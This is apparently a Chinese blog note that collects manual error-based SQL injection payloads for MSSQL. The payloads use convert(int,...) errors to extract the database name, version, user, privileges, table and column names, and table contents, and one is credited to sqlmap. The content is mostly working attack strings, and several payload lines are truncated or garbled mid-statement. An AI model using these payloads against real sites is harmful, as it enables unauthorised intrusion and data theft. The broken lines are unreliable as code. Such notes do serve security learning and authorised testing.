之前搞mssql数据库的注入都是直接跑工具,但是总是有些注入点工具一扫就崩,关键时候还是要手工注入,因此总结学习mssql手工注入,写此文留作笔记。本次主要总结显错注入!
payload:
?Id=admin' and 1=convert(int,(sql语句)) AND 'CvNI'='CvNI
1=convert(int,(db_name())) #获取当前数据库名
1=convert(int,(@@version)) #获取数据库版本
1=convert(int,(select quotename(name) from master..sysdatabases FOR XML PATH(''))) #一次性获取全部数据库
1=convert(int,(select '|'%2bname%2b'|' from master..sysdatabases FOR XML PATH(''))) #一次性获取全部
and 1=(select IS_SRVROLEMEMBER('db_owner')) #查看是否为db_owner权限、sysadmin、public (未测试成功)如果正确则正常,否则报错
1=convert(int,(user)) #查看连接数据库的用户
admin' AND 1878=CONVERT(INT,(SELECT SUBSTRING((CASE WHEN(IS_SRVROLEMEMBER('db_owner')=1)THEN '1' ELSE '0' END),1,100))) AND 'iaQQ'='iaQQ #来自sqlmap 也为测试成功。
ps:未测试成功可能是环境问题
1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('V_
1=convert(int,(select top 1 quotename(name) from [数据库名]..sysobjects where name not in('table_name1','table_name2') and xtype='U') #逐条获取表名,将报出来的表名放入tuple
1=convert(int,(select quotename(name) from [数据库名]..sysobjects where xtype='U' FOR XML PATH(''))) #一次性获取表名,如果表很多的话会失败。
1=convert(int,(select top 1 table_name from information_schema.tables where table_catalog=[数据库名table_catalog=[数据库名
having 1=1 --
group by column_name1,column_name2 having 1=1--
获取任意表中的列名
1=convert(int,(select quotename(name) from [数据库名]..syscolumns where id =(select id from [数据库
1=(select top 1 * from [数据库名]..[表名] FOR XML PATH(‘’))
https://www.cnblogs.com/beyond1983/archive/2013/04/16/3023707.html可以看看这篇文章,有助于学习(转载)